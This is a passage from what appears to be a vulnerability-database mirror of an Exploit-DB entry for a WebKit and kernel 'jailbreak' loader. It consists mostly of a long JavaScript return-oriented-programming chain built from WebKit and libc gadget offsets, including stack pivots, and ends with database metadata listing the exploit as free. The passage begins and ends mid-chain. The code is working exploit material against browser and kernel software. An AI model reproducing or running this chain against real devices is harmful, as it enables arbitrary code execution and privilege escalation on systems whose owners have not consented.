webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+280056, //L5336
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5335:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5336:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5337:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+280152, //L5338
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5338:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5340:
db([64, 0]); // 0x40
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+280272, //L5343
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+280256, //L5341
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5341:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5343:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+280384, //L5344
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+280416, //L5346
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+280400, //L5345
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5344:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5345:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5346:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+280584, //L5349
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+755774, //mov rax, rsi
libc_base+764760, //pop rsi
ropchain+280552, //L5347
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+280568, //L5348
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5347:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5348:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5349:
db([0, 0]); // 0x0
set_gadget(webkit_base+1438842,); //pop rdx
db([0, 0]); // 0x0
set_gadgets([
webkit_base+24132920, //div rsi ; add rax, rcx
libc_base+428453, //mov rax, rdx
libc_base+764760, //pop rsi
ropchain+280768, //L5353
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+755774, //mov rax, rsi
libc_base+764760, //pop rsi
ropchain+280736, //L5351
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+280752, //L5352
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5350:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5351:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5352:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5353:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+280824, //L5355
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5355:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+280952, //L5357
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+280968, //L5358
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+280936, //L5356
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5356:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5357:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5358:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+281048, //L5359
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+281064, //L5360
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5359:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5360:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+281152, //L5361
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+281168, //L5363
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5361:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5363:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5364:
db([4294967255, 4294967295]); // -0x29
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+1121481, //mov [rax], cl
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L5366:
db([4294967255, 4294967295]); // -0x29
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+281328, //L5369
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+281312, //L5367
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5367:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5369:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+281488, //L5373
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+281456, //L5371
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+281472, //L5372
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5370:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5371:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5372:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5373:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+281544, //L5375
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5375:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+281672, //L5377
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+281688, //L5378
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+281656, //L5376
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5376:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5377:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5378:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+281848, //L5382
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+281816, //L5380
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+281832, //L5381
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5379:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5380:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5381:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5382:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+281904, //L5384
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5384:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+282032, //L5386
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+282048, //L5387
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+282016, //L5385
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5385:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5386:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5387:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+282128, //L5388
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+282144, //L5389
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5388:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5389:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+282240, //L5391
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+282224, //L5390
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5390:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5391:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+282320, //L5392
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5392:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5393:
db([10, 0]); // 0xa
set_gadget(libc_base+144605,); //pop rdi
//L5394:
db([10, 0]); // 0xa
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+282464, //L5395
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+282496, //L5397
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+282480, //L5396
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5395:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5396:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5397:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+282672, //L5399
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+282688, //L5400
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+282656, //L5398
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5398:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5399:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5400:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+282800, //L5402
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+282848, //L5405
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+282816, //L5403
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5402:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5403:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5404:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5405:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+282960, //L5406+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+282952, //L5406
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L5406:
db([0, 0]); // 0x0
set_gadgets([
ropchain+282976, //L5406+24
ropchain+284112, //L5401
libc_base+759608 //pop rax
]);
//L5407:
db([48, 0]); // 0x30
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+283064, //L5408
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5408:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5410:
db([4294967255, 4294967295]); // -0x29
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+283184, //L5413
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+283168, //L5411
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5411:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5413:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+283344, //L5417
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+283312, //L5415
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+283328, //L5416
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5414:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5415:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5416:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5417:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+283400, //L5419
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5419:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+283528, //L5421
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+283544, //L5422
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+283512, //L5420
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5420:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5421:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5422:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+283704, //L5426
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+283672, //L5424
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+283688, //L5425
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5423:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5424:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5425:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5426:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+283760, //L5428
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5428:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+283888, //L5430
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+283904, //L5431
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+283872, //L5429
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5429:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5430:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5431:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+284016, //L5432
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+284048, //L5434
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+284032, //L5433
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5432:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5433:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5434:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+782311, //pop rsp
ropchain+286504, //L5435
//L5401:
libc_base+764760, //pop rsi
ropchain+284152, //L5436
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5436:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5438:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+284272, //L5441
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+284256, //L5439
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5439:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5441:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+284448, //L5444
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+284464, //L5445
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+284416, //L5442
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+284432, //L5443
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5442:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5443:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5444:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5445:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+284560, //L5447
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+284544, //L5446
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5446:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5447:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5448:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5449:
db([5, 0]); // 0x5
set_gadget(libc_base+763368,); //pop rcx
//L5450:
db([5, 0]); // 0x5
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+284760, //L5452
webkit_base+660161, //mov [rsi], rax ; m

Trust: 0.6

sources: EDBNET: 104142

PRICE

free

Trust: 0.6

sources: EDBNET: 104142

TYPE

'Jailbreak' Webkit / Kernel Loader 'SOCK_RAW' 'IP6_EXTHDR_CHECK'

Trust: 0.6

sources: EDBNET: 104142

EXTERNAL IDS

db:	EXPLOIT-DB	id:	49664	Trust: 0.6
db:	EDBNET	id:	104142	Trust: 0.6

sources: EDBNET: 104142

REFERENCES

url:

https://www.exploit-db.com/exploits/49664/

Trust: 0.6

sources: EDBNET: 104142

SOURCES

db:

EDBNET

id:

104142

LAST UPDATE DATE

2022-07-27T09:18:06.190000+00:00

SOURCES RELEASE DATE

db:

EDBNET

id:

104142

date:

2021-03-29T00:00:00